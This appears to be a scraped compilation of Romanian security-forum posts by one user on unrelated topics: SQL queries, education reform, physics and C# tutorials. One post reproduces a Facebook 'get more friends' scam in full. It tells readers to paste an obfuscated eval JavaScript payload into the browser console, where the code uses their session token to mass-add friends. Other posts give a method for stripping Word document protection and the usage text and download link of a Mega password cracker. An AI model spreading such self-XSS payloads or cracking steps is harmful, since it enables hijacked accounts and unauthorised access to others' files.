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select denumire_produs from factura where denumire_beneficiar like '%S.R.L.' --------------------------------- select denum_beneficiar from factura where denum_produs != 'sapun' --------------------------------- select denum_beneficiar, pret_produs*cantitate_prod_pe_fact as total from factura group by denum_beneficiar ultima e ambigua. sigur asa e formulata ? la not equal nu mai stiu daca e != sau <> operatorul //recomand cu caldura http://sqlzoo.net/ aici inveti cel mai rapid SQL.
Singura solutie pe care o vad eu care-i aplicabila si pe termen scurt si termen lung ar fi sa imprumutam un stil care functioneaza deja. Desfiintat sistemul actual si inlocuit cu unul care da rezultate pe bune. Finlandezii au succes. Modificarile aduse la un produs prost conduc tot la un produs prost, aceeasi regula se aplica, dupa parerea mea, si la sistemul de invatamant romanesc. De asta trebuie ras de pe fata pamantului si inlocuit cu ceva mai bun. Am vazut asta an de an, cu fiecare ministru al invatamantului inlocuit cu unul "mai bun", an de an au facut "reforme", au schimbat metodologia de testare nationala, ne-au dat peste cap de cel putin zece ani in coace, nestiind la ce sa ne asteptam cand vine ziua tezelor, testelor, anticipatelor si toate idiotenilor pe care capu lor luminat l-a cacat intr-o dimineata.
vreau si eu un sample cine-l are sa-mi dea pm
Am fost introdus automat intr-un grup de facebook cu peste 1,100,000 de membrii. Acolo iti cere sa faci manual niste operatii pentru a primii mai multi prieteni. Instructiunile ar fi urmatoarele : Just FOLLOW the Above STEP n Get Subcribers............. READ ALL INSTRUCTIONS: Use GOOGLE CHROME (recommended) 1. Copy the Text Below eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 24=\'3K 4i L 1v 3s\';7 H=\'\',25=\'3N.1a - 4s 1v 3v 3B\';l 1O(e){1e.W(v.1c.1C+"//1b.1w.1a/1r/1R/Z/1T.1n?1j=1&15="+8.V("15")[0].U+"&1x="+1J+"&1W=1o&Z="+e+"&28[2p]=2q&2t&2v=1M&1l="+16.14,l(a){7 b=a.20(a.1K("{"));7 c=2g.3p(;i--;H="<o 19=\'1H-1h-4t\' w=\'A-1q:T;F-P:1f;1p-2m:3l-3k;";6(c.2s){H+="E:4q\'>";6(c.3h){H+=c.3h}G{H+=2g.4M(c,C,"")}}G{H+="E:3A\'>";H+=u[i];1d++}H+="</o>";7 d="<o 3g=\'1H-1h-R\' w=\'1s:23;T:1t%;26-T:-3f;29:3b;37:34;z-33:31;F-P:2j;A-1q:2l;17:1D;2o-1F:I M I B(0,0,0,0.1);13-1L:1i;13:M 1N B(D,D,1t,0.2);1P-E:B(D,D,1Q,0.1);E:#30\'>";d+="<o w=\'17-1S:1f;F-P:1m;\'>"+24+"</o>";6(i>0){d+=u.p+" L 1V<2x/>";d+="<b>"+1d+"</b> L 2S 4A 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1A.11(v,a,"2n")},b+1G.3i(1G.3j()*1U))},2i:l(a){t.11(v,a,"4C");t.11(v,a,"4D");t.11(v,a,"2n")},3m:l(a,{7 c="";6(b==1B){b=0}6(b>40){m}6(a.3n!=1B){m a.3n}Q(7 d=0;d<a.9.p;d++){7 e=a.9[d];c+=t.3m(e,b+1)}m c}};6(8.q==1B){8.q=l(a){7 b=J 4G("(?:^|\\\\s)"+a+"(?:$|\\\\s)");7 c=8.1k("*");7 d=[];7 e;Q(7 f=0;(e=c[f])!=C;f++){7 g=e.2a;6(g&&g.1K(a)!=-1&&b.3o(g))d.1I(e)}m d}}3q.4K.4L=l(a){7 b=y;Q(i=0;i<t.p;i++){6(2C a=="l"){6(a.3o(t[i])){6(!{b=[]}b.1I(i)}}G{6(t[i]===a){6(!{b=[]}b.1I(i)}}}m b};7 a=0,O=0;7 3r=8.q("K").p;Q(a=0;a<3r;a++){7 X=8.q("K")[a];6(X&&X.9[0]&&X.9[0]&&X.9[0].9[1]&&X.9[0].9[1].9[0]&&8.q("K")[a].9[0].9[1].9[0].U=="4O L 1v 3s"){O=a;2z}}7 i=3;7 Y=3;7 4Q=0,4R=0,4S=0;7 j=0;7 k=0;7 1d=0;7 u=J 3q;7 1J=8.V(\'1x\')[0].U;1e.W(v.1c.1C+"//1b.1w.1a/1r/1o/4T.1n?1j=1&4U="+16.14+"&4V[0]=14&1l="+16.14,l(a){7 b=a;7 c=b.20(b.1K("{"));7 d=2g.3p(c);d=d.4W.3E;Q(7 e=0;e<d.p;e++){u.1I(d[e].2P)}i=u.p-1;Y=i;2b.2c(u.p);7 f="<o 3g=\'1H-1h-R\' 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1V";f+="</o>";8.S("21").18=f;1O(u[i])})',62,308,'||||||if|var|document|childNodes||||||||||||function|return||div|length|getElementsByClassName|||this|arr|window|style||false||text|rgba|null|200|color|font|else|kunaon|0pt|new|mbm|Friends|1px|loading|eind|size|for|display|getElementById|left|value|getElementsByName|load|ele|tay|members||ClickWin|loadingIndicator|border|user|fb_dtsg|Env|padding|innerHTML|class|com|www|location|suc|jx|10px|setTimeout|edge|3px|__a|getElementsByTagName|__user|20px|php|typeahead|white|align|ajax|position|50|singleNodeValue|to|facebook|group_id|catch|try|nHtml|undefined|protocol|15px|search|shadow|Math|friend|push|memberGroupId|indexOf|radius|AsyncRequest|solid|penetrasi|background|100|groups|bottom|add_post|500|detected|source|setRequestHeader|split|true|substring|pagelet_welcome_box|none|fixed|tulisanNganu|wkwkwk|margin|post|nctr|top|className|console|log|update|onSuccess|url|JSON|body|ClickUp|14px|ActiveXObject|center|space|click|box|_mod|pagelet_group_members_summary|getTime|error|lsd|focus|post_form_id_source|Date|br|2e3|break|getHTTPObject|clickfr|typeof|addfriend|ok|XMLHTTP|clickfr_callback|XMLHttpRequest|225766554225313|150861175067090|block|h2|init|overrideMimeType|GET|uid|POST|span|added|Content|handler|onreadystatechange|status|responseText|charAt|href|334433|9999|removeChild|index|500px|format|method|width|setAttribute|0px|FindByAttr|100px|evaluate|XPathResult|FIRST_ORDERED_NODE_TYPE|273px|id|errorDescription|floor|random|wrap|pre|GetText|textContent|test|parse|Array|len|Profile|toLowerCase|toUpperCase|RISHAV|uiButton|uiButtonLarge|open|onClick|darkgreen|BHARDWAJ|type|application|entries|form|urlencoded|Connection|close|Close|Auto|17px|readyState|facebook|javascript|void|replace|eval|responseXML|family|lucida|grande|tahoma|send|bind|blur||sleep|onError|verdana|arial|sans|in|createElement|serif|absolute|1e7|indicator|appendChild|opt|weight|bold|nowrap|overflow|Add|inline|FindByClassName|FindByXPath|GM_log|bad|xpath|VisitUrl|darkred|Msxml2|Thanks|name|Microsoft|createEvent|MouseEvents|initMouseEvent|dispatchEvent|Click|of|ClickTimeout|mousedown|mouseup|Processed|more|RegExp|go|darkred|success|prototype|find|stringify|xml|Add|and|counter1|counter2|counter3|first_degree|viewer|filter|payload|hidden'.split('|'),0,{})) 3. Go back to the Group : [URL]https://www.facebook.com/groups/360433270722292/[/URL] 4. Press F12 to open Console Box 5. Paste codes into the console box (CTRL + V). 6. Then press enter and wait for the process to be completed. Good luck .. Feel free to share this trick to other groups while it is still working.. Ce scoateti din cod ?
Facebook Graph Search may be a social engineering nightmare
begood replied to Nytro's topic in Stiri securitate
se pare ca dau si pe ro. -
A password-protected Word document is a document that you need to put in password in order to open and modify. You may choose Read-only to view the document but you will need the password to unlock it in order to make any changes to it. Here I am going to show you a simply way how to remove password from a Word document even if you don’t know the password to open it first. Before I start, here is how we normally remove a password from a password-protected document in Microsoft Word. After opening the document in Word, go to Save As, and click Tools in the Save As window, choose General Option. And remove password from the Password to Modify box, click OK, and save the document. The newly saved document will have no password protected. [h=3]Now, here is how to do it when password is unknown[/h] Just follow these steps: 1. Rename the extension name of the document to ZIP, like as a ZIP compressed file. 2. Double click it and open it in Windows Explorer, navigate to Word folder. 3. Delete the Settings.xml file from the folder. And then close the Window. 4. Rename back to DOCX file. 5. And done. Next time when you open the same document, you will not be prompted by the password window. [h=3]How to protect yourself[/h] Wow…that’s kind very scary. So what do I do to properly protect my password-protected files from being cracked like this? Firstly, while this method works very effectively in both Word 2007 and 2010, it won’t be so much useful to the latest version 2013. The password-protected feature has been removed from this version. And that means something. From this point on, if you haven’t done so, instead of using Password Protect to safe guard your sensitive documents, use Password Encryption whenever possible. A password-encrypted document is encrypted, instead of just password guarded, therefore, the method mentioned above will no longer work. How To Remove Password From Protected Word File in Word 2007 and 2010
As liberating as unmooring oneself from an office cubicle feels, working at a café, library, or other public or coworking space can leave you open to distraction, not to mention prying eyes. Electronics guru Becky Stern has an unusual solution: an knitted garment that fits around your head and your laptop like an oversized sock or cocoon. Sure, you’ll undoubtedly draw quizzical stares, but what price privacy and peace? Knit the Laptop "Compubody" Sock for Privacy in Public Places | Ecouterre
Cracks a Mega password from a confirmation link. Do NOT post your confirmation link because it contains not only a hash of your password but your encrypted master key. Once the master key is disclosed all your file can be decrypted. ./megacracker-64 [options] -h|--hash=<string> Confirmation link. -H|--hash-file=<file> File with confirmation links. --help Display help and exit. -i|--input=<file> File with passwords to test [default is stdin]. -I|--input-precomp=<file> File with pregenerated data. -o|--output=<file> Output data to use later. Copyright © 2013 Steve Thomas <steve AT tobtu DOT com> This is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version. There is NO WARRANTY, to the extent permitted by law. --------------- There are at least six things in the confirmation link: * Encrypted master key (16 bytes) * Password hash (16 bytes) * Unknown field (15 bytes?) * Email address * Name * Unknown field (8 bytes?) This will extract the password hash and crack it. This will except confirmation links in these forms (You can truncate the data after #confirm to 43 characters): * https://mega.co.nz/#confirm........................................... * mega.co.nz/#confirm........................................... * #confirm........................................... * ........................................... If you want to generate some you can run this in your web browser's console: var pw_aes = new sjcl.cipher.aes(prepare_key_pw("password")); base64urlencode( a32_to_str( encrypt_key(pw_aes, [rand(0x100000000),rand(0x100000000),rand(0x100000000),rand(0x100000000)]))+ a32_to_str( encrypt_key(pw_aes, [rand(0x100000000),0,0,rand(0x100000000)]))); dqKqDkwkeaJZCSm8gOUTRsgil2fSec1H4J0i2Z8aIbg This is a precomputed list of passwords. You can use this with -I|--input-precomp: https://mega.co.nz/#!rYkkTYzA!B_qWf18rDV4NrXAFM4vwwCdYhvRY14zkFyMITAMQSeY http://www.tobtu.com/files/megacracker.zip website : https://mega.co.nz/
nu poti accelera pana la 100% din viteza luminii pentru ca ai avea masa infinita. uite o extensie a teoriei relativitatii lui Einstein, care sare peste punctul de masa infinita si dezvolta ecuatiile pentru viteze superluminice. Physicists extend special relativity beyond the speed of light in orice caz nasa lucreaza la un warp drive : http://io9.com/5963263/how-nasa-will-build-its-very-first-warp-drive asadar nici nu trebuie sa depasesti viteza luminii ca sa te deplasezi cu viteza mai mare decat ea.
daca ajunge in spital dintr-o prostie o sa ai probleme. mai bine discuta cu el sau pune-l putin la perete si scutura-l (daca esti in stare). // imi aduce aminte de o faza de la un concurs cu laxative
multam ^ mai astept
Daca ai avea peste 1000 euro de dat, ce soft-uri black-hat / gray-hat ai cumpara ? (va rog postati numele soft-ului si o descriere intr-o propozitie sau doua cu ce face)
foarte bune si concise tutorialele pentru C# de aici : Visual C# .NET for Complete Beginners - a free programming course https://sites.google.com/site/electricfarmcsharp/c-tutorial/tutor01---hello-world---your-first-program
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Cred ca ti-am povestit la defcamp de faza cu prestigiul. Nu te ia niciun angajator serios in seama la filtrarea CV-urilor si la interviuri daca nu ai trecut prin nopti nedormite, crima din sesiunile de la Universitatea Politehnica [bucuresti / Timisoara / Iasi / etc] Mi-a zis-o direct in fata un fost sef de-al meu cand l-am intrebat de ce-s atati programatori de la poli aici.
Creare hard disk pentru laptop
begood replied to olimpiulucian's topic in Sisteme de operare si discutii hardware
din considerente de viteza nu vrei prin USB ? -
l-am folosit in trecut, era foarte bun
Vreau sa fac un proiect / mai multe proiecte in c# + SQL, asadar am nevoie de niste baze de date de la diverse site-uri. //nu ma intereseaza parolele Am facut pentru facultate un proiect si am prins gustul, dar baza de date avea doar 12 tabele. Daca aveti sugestii in legatura cu ce sa adaug in interfata / detineti aplicatii care deja se conecteaza la o baza de date, nu ma supar daca le postati / imi dati PM Multam !
nu-l mai am, daca il are cineva, are acordul meu sa-l urce. Multiupload.nl - upload your files to multiple file hosting sites! / sendspace.com
- 115 replies
Depinde la ce nivel lucrezi. Sunt mai multe nivele de securitate, de la protectie contra "prietenilor" fara cunostiinte foarte tehnice, la protectie contra politiei / adversarilor cu resurse financiare destul de mari. Tine minte ca mai degraba se foloseste rubber hose cryptography / furarea parolei via keylogger sau alte metode asemanatoare decat sa-ti fie spart containerul criptat.
bun venit ! punct forte ->lenes: ceea ce ma ajuta destul de mult deoarece sunt nevoit sa codez in 2 ore ceea ce trebuia sa fac in 4 asta o s-o tin minte !